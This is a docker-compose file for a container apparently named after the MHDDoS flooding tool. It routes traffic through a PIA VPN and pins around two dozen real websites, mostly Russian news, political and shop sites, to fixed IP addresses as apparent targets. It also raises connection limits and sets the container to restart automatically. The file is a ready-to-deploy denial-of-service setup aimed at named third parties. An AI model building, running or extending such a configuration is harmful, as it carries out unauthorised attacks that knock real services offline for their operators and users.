version: '2.4'
services:
 ptndown-mhddos-pia:
  build:
    args:
      PIA_USER: ${PIA_USER}
      PIA_PASS: ${PIA_PASS}
    context: .
    dockerfile: Dockerfile
  cap_add:
    - NET_ADMIN
  devices:
    - /dev/net/tun
  extra_hosts:
    - 56orb.ru:5.188.73.213
    - babolat-shop.ru:37.143.9.233
    - www.donnews.ru:185.179.190.159
    - dontimes.ru:87.236.16.17
    - evening-crimea.com:116.202.245.90
    - fine-news.ru:213.139.208.57
    - gorlovka-news.su:87.236.16.171
    - www.kia.ru:176.107.161.73
    - kuban24.tv:82.202.160.250
    - lug-info.com:185.12.125.139
    - mkset.ru:5.188.73.213
    - mosregtoday.ru:178.154.213.69
    - nation-news.ru:82.202.163.4
    - novorossiia.ru:136.243.2.150
    - pikabu.ru:91.228.155.94
    - politcentr.ru:87.236.16.126
    - politexpert.net:188.124.36.76
    - rostovgazeta.ru:5.188.73.213
    - russia-insider.com:158.69.116.70
    - sbarro-pizza.ru:185.165.123.36
    - therussophile.org:3.66.136.156
    - wpristav.com:193.109.246.53
    - xvesti.ru:31.31.198.206
  image: fluxstate/ptndown-mhddos-pia
  restart: unless-stopped
  sysctls:
    - net.ipv4.tcp_timestamps=0
    - net.ipv6.conf.all.disable_ipv6=1
    - net.ipv6.conf.default.disable_ipv6=1
  ulimits:
    nofile:
      soft: 1048576
      hard: 1048576
